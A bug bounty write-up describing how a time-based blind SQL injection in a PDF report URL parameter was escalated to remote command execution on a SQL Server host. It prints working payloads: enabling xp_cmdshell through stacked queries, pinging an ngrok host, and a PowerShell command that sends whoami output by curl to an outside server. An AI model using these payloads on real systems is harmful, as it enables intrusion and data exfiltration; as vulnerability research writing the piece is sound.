Hello hackers, before we get into it, I would like to know your view of this — between a hacker’s curiosity and instinct which would you consider a more valuable asset?

Now as the title of this writeup indicates, I would be covering how I leveraged an SQL injection (SQLi) vulnerability on a web application to perform a Remote Command Execution (RCE) on the server hosting the target application. NB: Due to an NDA, I will not be able to disclose the name of the program.

Let’s first define what SQLi and RCE are:

What is an SQL Injection: SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. -source: Imperva

What is a Remote Command Execution (Command Injection): Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application -source: OWASP

While manually going through the pages of the app, I came across a pdf report generating functionality. Nothing seemed out of the ordinary or exploitable except the URLs of the pdf generated pages — they had parameters (see Figure 1).

Figure 1

I tried triggering errors using the various parameters but none of them worked except one parameter, which produced a 500 error page after I inserted an asterisk *(see Figure 2).

Figure 2

According to lifewireThe 500 Internal Server Error is a very general HTTP status code that means something has gone wrong on the website’s server, but the server could not be more specific on what the exact problem is.”

I decided to trigger a 10-seconds time-based blind SQLi using the WAITFOR keyword in SQL Server. This resulted in the page returning a response after 12 seconds (12,000 milliseconds) (see Figure 3)

Figure 3

— for a page that returned results after 2 seconds, I began to feel excited. After using 20 seconds and getting a response after 22 seconds (22,000 milliseconds), I couldn’t be more sure of my finding (see Figure 4).

Figure 4

Now that I was sure that I was dealing with an SQL Server, I leveraged the SQLi vulnerability to enable xp_cmdshell using ; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE; — (see Figure 5)

Figure 5

After enabling the xp_cmdshell, I pinged my http-server using ;EXEC xp_cmdshell ‘ping xxxxxxxx.ngrok.io’; — and got a response. Awseome!

As you can see from the command below, the output of the command in PowerShell is sent to my HTTP server using curl. I used the command whoami, and got the response “nt servicemssqlserver” (see Figures 6 and 7)

;EXEC xp_cmdshell ‘powershell -c “$x = whoami; curl http://xxxxxx.net/get?output=$x“‘;–

Figure 6
Figure 7

In order to prevent this attack, it is important to make use of Parameterized Queries.

As always, your feedback on this write-up will be very much appreciated.

Disclaimer: This write-up is for educational purposes only. I am in no way responsible for its misuse.